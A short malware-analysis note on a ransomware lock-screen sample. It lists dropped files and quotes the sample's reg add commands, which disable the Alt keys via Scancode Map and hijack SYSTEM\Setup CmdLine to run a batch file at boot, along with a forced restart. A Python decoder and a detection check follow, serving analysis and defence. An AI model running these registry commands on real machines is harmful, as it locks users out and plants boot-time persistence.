19.11.2018, 22:55
Some Ransom LockScreen
Dropped files
C:\setup.bat
C:\clear.bat
C:\payload.hta
C:\Users\admin\AppData\Local\Temp\RarSFX0\clear.bat
C:\Users\admin\AppData\Local\Temp\RarSFX0\payload.hta
C:\Users\admin\AppData\Local\Temp\RarSFX0\init.bat
C:\Users\admin\AppData\Local\Temp\RarSFX0\setup.bat
Registry:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 0000000000000000040000003800450000003800000038E000000000 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v SetupType /t REG_DWORD /d 2 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Setup" /v CmdLine /t REG_SZ /d "cmd.exe /C C:\setup.bat" /f
write:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout
HKEY_LOCAL_MACHINE\SYSTEM\Setup
Actions: access to a COM interface, direction: LocalSecurityAuthority.Shutdown, which leads to a restart (CMD shutdown -r -t 35 -f) and a lock screen.
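The Scancode Map blob above is the interesting part of the registry changes, and the sandbox output does not decode it. The following is an added example (not from the post or the sample) that parses the value in the documented Scancode Map layout and names the remapped keys, and adds a small check for the SYSTEM\Setup trick: SetupType=2 makes Windows run the command in CmdLine at the next boot, before the logon screen, which is how C:\setup.bat gets executed after the forced restart. The function names and the short scan-code name table are mine; the scan-code values are standard set 1 codes (0xE0-prefixed for extended keys).

```python
from __future__ import annotations
import struct

# Scan-code set 1 values for the keys this sample touches, plus a few other
# keys lock screens commonly disable. Extended keys carry an 0xE0 prefix.
SCANCODE_NAMES = {
    0x0001: "Esc", 0x000F: "Tab", 0x001D: "LeftCtrl", 0x0038: "LeftAlt",
    0x003E: "F4", 0x0045: "NumLock", 0xE01D: "RightCtrl", 0xE038: "RightAlt",
    0xE053: "Delete", 0xE05B: "LeftWin", 0xE05C: "RightWin",
}

# The value exactly as written by the sample's reg add command (copied from the post).
SAMPLE_SCANCODE_MAP = bytes.fromhex(
    "0000000000000000040000003800450000003800000038E000000000"
)


def parse_scancode_map(blob: bytes) -> list[tuple[int, int]]:
    """Decode a Scancode Map value into (original_scancode, new_scancode) pairs.

    Layout: DWORD version (0), DWORD flags (0), DWORD entry count including
    the null terminator, then one DWORD per entry whose low word is the scan
    code to emit and whose high word is the physical key being remapped.
    A new scan code of 0 disables the key.
    """
    if len(blob) < 16 or len(blob) % 4:
        raise ValueError("Scancode Map must be at least 16 bytes and DWORD aligned")
    version, flags, count = struct.unpack_from("<III", blob, 0)
    if version != 0 or flags != 0:
        raise ValueError(f"unexpected header version={version} flags={flags}")
    if len(blob) != 12 + 4 * count:
        raise ValueError(f"entry count {count} does not match blob length {len(blob)}")
    entries = struct.unpack_from(f"<{count}I", blob, 12)
    if entries[-1] != 0:
        raise ValueError("mapping list is not null terminated")
    return [(dword >> 16, dword & 0xFFFF) for dword in entries[:-1]]


def key_name(code: int) -> str:
    return SCANCODE_NAMES.get(code, f"0x{code:04X}")


def describe_scancode_map(blob: bytes) -> list[str]:
    """Human-readable summary, one line per remapped key."""
    lines = []
    for orig, new in parse_scancode_map(blob):
        if new == 0:
            lines.append(f"{key_name(orig)} -> disabled")
        else:
            lines.append(f"{key_name(orig)} -> acts as {key_name(new)}")
    return lines


def setup_hijack_present(setup_type: int, cmdline: str) -> bool:
    """SetupType=2 makes Windows run HKLM\\SYSTEM\\Setup\\CmdLine at the next
    boot before the logon screen. Outside a real Windows setup, SetupType 2
    together with a non-empty CmdLine is a boot-time persistence indicator."""
    return setup_type == 2 and bool(cmdline.strip())


if __name__ == "__main__":
    for line in describe_scancode_map(SAMPLE_SCANCODE_MAP):
        print(line)
    print("Setup hijack:", setup_hijack_present(2, r"cmd.exe /C C:\setup.bat"))
```

For this sample the decoder reports NumLock remapped to act as Left Alt and both Alt keys disabled, so Alt+F4, Alt+Tab and Ctrl+Alt+Del no longer work on the lock screen after the reboot. Cleanup is to delete the Scancode Map value and reset SetupType to 0 with an empty CmdLine; both take effect only after the next restart, since the keyboard filter reads the map at boot.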